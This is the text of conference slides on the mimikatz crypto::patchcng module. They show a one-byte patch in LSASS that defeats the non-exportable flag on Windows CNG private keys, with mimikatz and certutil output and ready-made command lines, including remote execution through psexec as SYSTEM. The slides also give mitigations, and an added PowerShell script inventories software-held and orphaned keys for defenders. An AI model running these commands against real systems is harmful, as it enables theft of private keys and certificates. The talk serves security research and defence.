“Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior.”
– http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
“To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default.”
This time, key operations are not made in the “user” process context
Processes use RPC to call “Key isolation service” (keyiso) functions
It seems more secure than CryptoAPI…
– It is, but it’s not perfect…
mimikatz :: crypto :: cng
how it’s exported (PLAYSKOOL level)
[Diagram : Process → RPC → KeyIso Service (LSASS Process ; NT6 System protected process, ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP, SYSTEM_MANDATORY_LABEL_NO_READ_UP) → CNG → Load Private Key (DPAPI Decode) → Ask to export Key → Exportable ? → yes : Exported Key / no : NTE_NOT_SUPPORTED]
mimikatz :: crypto :: patchcng
because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key), RPC calls lead to lsass(keyiso):ncrypt!SPCryptExportKey
This function does all the work to prepare the export, and checks if the key is exportable (Exportable ?)
mimikatz # crypto::exportKeys
[user] Clés CNG :
 - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
        Exportabilité : NON
        Taille clé    : 2048
        Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO
        mod_cryptong::getPrivateKey/PrivateKeyBlobToPVK : (0x80090029) L'opération demandée n'est pas prise en charge.
mimikatz :: crypto :: patchcng
because sometimes I own LSASS
This time, checks and keys are in LSASS process…
And what ?
Before :
.text:6C815210 75 1C    jnz     short continue_key_export
After :
.text:6C815210 EB 1C    jmp     short continue_key_export
I wrote “1” byte in LSASS memory space…
mimikatz :: crypto :: patchcng
demo time !
Import, export, import as not exportable…. export again
mimikatz :: crypto :: patchcng
limitations
Patch operation needs some privileges
– Admin (debug privilege)
– SYSTEM
mimikatz crypto::patchcng only deals with :
– Microsoft Software Key Storage Provider (maybe other algorithms than RSA)
Not a limitation of mimikatz, but the MMC certificates snap-in cannot export CNG certificates… even those that are exportable (huh ?)
– certutil can…
51
mimikatz :: crypto :: patchcng
bonus
After one admin has patched LSASS, all users of the current system benefit from the extra exports
– until reboot / KeyIso service restart
Some other programs that don’t check the export flag before asking for the export can work too
– Yeah, like the good old one : certutil
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
Fournisseur = Microsoft Software Key Storage Provider
La clé privée NE PEUT PAS être exportée
Succès du test de chiffrement
CertUtil : -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
Fournisseur = Microsoft Software Key Storage Provider
Succès du test de chiffrement
CertUtil: -exportPFX La commande s'est terminée correctement.
52
mimikatz :: crypto
memo
Some commands :
– mimikatz crypto::patchcapi crypto::exportCertificates exit
– psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" "crypto::exportKeys computer" exit
– mimikatz # crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE "Remote Desktop"
– mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit
Password :
– PFX files are protected by this password : mimikatz
Keys
– When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
– When you delete a certificate, Windows does not delete its private key… funny, isn’t it ?
• So yes, mimikatz can export it
53
mimikatz :: crypto
what can we do ?
Exactly the same as for sekurlsa : prevent access to accounts / computers !
– no admin, no admin, no admin…
Basics
– Use smartcards/token for users certificates
– Use Hardware Security Modules (HSM), even SoftHSM
More in depth
– See what Microsoft can do with TPM from Windows 8
• Virtual SmartCard seems promising
– Verify vendors’ implementations (Lenovo, Dell, …) of TPM CSP/KSP
• Their biometrics stuff was a little buggy ;)
54
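The memo slide notes that Windows leaves private keys behind when a certificate is deleted or re-imported, and this slide recommends moving user keys onto smart cards, TPM or HSM. The inventory below turns both into something an administrator can run: for every certificate with a private key it reports which provider holds the key (software KSP or CSP versus a smart card or TPM provider), whether the key is flagged exportable, and which CNG key files in the user’s key folder no certificate references any more. It is an added example written for this page, not mimikatz code and not from the slides; it assumes Windows PowerShell 5 with .NET 4.6.1 or later (for the RSACertificateExtensions / ECDsaCertificateExtensions helpers), and it assumes that for the Microsoft Software Key Storage Provider the CngKey.UniqueName is the file name under %APPDATA%\Microsoft\Crypto\Keys (marked as an assumption in the code).

```powershell
# Added example (not from the slides, not mimikatz code): inventory the private keys
# behind certificates and list CNG key files no certificate references any more.
# Assumes Windows PowerShell 5 / .NET 4.6.1+; run elevated to see LocalMachine keys.

$SoftwareKsp = 'Microsoft Software Key Storage Provider'   # the provider the slides' patch targets

function Get-CertificateKeyInventory {
    param([string[]]$StorePath = @('Cert:\CurrentUser\My', 'Cert:\LocalMachine\My'))
    foreach ($path in $StorePath) {
        $certs = Get-ChildItem -Path $path -ErrorAction SilentlyContinue | Where-Object { $_.HasPrivateKey }
        foreach ($cert in $certs) {
            $row = [ordered]@{
                Store = $path; Subject = $cert.Subject; Thumbprint = $cert.Thumbprint
                Provider = $null; Exportable = $null; Hardware = $null; UniqueName = $null
            }
            $key = $null
            try {
                $key = [System.Security.Cryptography.X509Certificates.RSACertificateExtensions]::GetRSAPrivateKey($cert)
                if (-not $key) {
                    $key = [System.Security.Cryptography.X509Certificates.ECDsaCertificateExtensions]::GetECDsaPrivateKey($cert)
                }
                if ($key -is [System.Security.Cryptography.RSACryptoServiceProvider]) {
                    # Legacy CryptoAPI (CSP) key: flags live in the key container info
                    $csp = $key.CspKeyContainerInfo
                    $row.Provider   = $csp.ProviderName
                    $row.Exportable = $csp.Exportable
                    $row.Hardware   = $csp.HardwareDevice
                    $row.UniqueName = $csp.UniqueKeyContainerName
                } elseif ($key -and $key.Key -is [System.Security.Cryptography.CngKey]) {
                    # CNG (KSP) key: ExportPolicy is the flag the exportability check in LSASS enforces
                    $cng = $key.Key
                    $row.Provider   = $cng.Provider.Provider
                    $row.Exportable = (($cng.ExportPolicy -band [System.Security.Cryptography.CngExportPolicies]::AllowExport) -ne 0)
                    # Heuristic: any provider other than the software KSP (smart card KSP, TPM
                    # "Microsoft Platform Crypto Provider", vendor KSPs) is treated as hardware-backed
                    $row.Hardware   = ($cng.Provider.Provider -ne $SoftwareKsp)
                    $row.UniqueName = $cng.UniqueName
                }
            } catch {
                $row.Provider = "error: $($_.Exception.Message)"
            } finally {
                if ($key) { $key.Dispose() }
            }
            [pscustomobject]$row
        }
    }
}

function Get-OrphanedCngKeyFile {
    # Assumption: for the software KSP, CngKey.UniqueName is the file name in this folder
    # (user keys; machine keys live under $env:ProgramData\Microsoft\Crypto\Keys).
    param([string]$KeyFolder = (Join-Path $env:APPDATA 'Microsoft\Crypto\Keys'))
    $referenced = @(Get-CertificateKeyInventory -StorePath 'Cert:\CurrentUser\My' |
                    Where-Object { $_.UniqueName } | ForEach-Object { $_.UniqueName })
    Get-ChildItem -Path $KeyFolder -File -ErrorAction SilentlyContinue |
        Where-Object { $referenced -notcontains $_.Name } |
        Select-Object Name, Length, LastWriteTime
}

# Software-held keys are the only ones a patched LSASS can hand out; review these first
Get-CertificateKeyInventory | Where-Object { -not $_.Hardware } |
    Format-Table Store, Subject, Provider, Exportable -AutoSize

# Key files left behind by deleted or re-imported certificates (candidates only, confirm before deleting)
Get-OrphanedCngKeyFile | Format-Table -AutoSize
```

The rows worth attention are the software-held keys marked non-exportable: that flag is enforced only by the check inside LSASS that the patchcng slides bypass, so for those keys the remedy is migration to a smart card, TPM or HSM rather than trusting the flag. The orphan list is a list of candidates, not proof: a key file may belong to an application that uses NCrypt directly without a certificate, so cross-check with certutil -user -key before deleting anything.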
mimikatz
what else can it do ?
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM / AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker / SRP bypass
Driver
 – Play with tokens & privileges
 – Display SSDT x86 & x64
 – List minifilters actions
 – List Notifications (process / thread / image / registry)
 – List Objects hooks and procedures
 – …
…
55
mimikatz
that’s all folks !
Thanks to / Merci à :
– my girlfriend for her support (her LSASS crashed a few times)
– Application Security Forum for offering me this great opportunity
• Partners and Sponsors for sure !
– Microsoft for always considering it as normal/acceptable
– Security friends/community for their ideas & challenges
• nagual, newsoft, mubix, …
– You, for your attention !
Questions ?
Don’t be shy ;)
especially if you have written the corresponding slide number
56
Blog, Source Code & Contact
blog : http://blog.gentilkiwi.com
mimikatz : http://blog.gentilkiwi.com/mimikatz
source : https://code.google.com/p/mimikatz/
email : [email protected]
57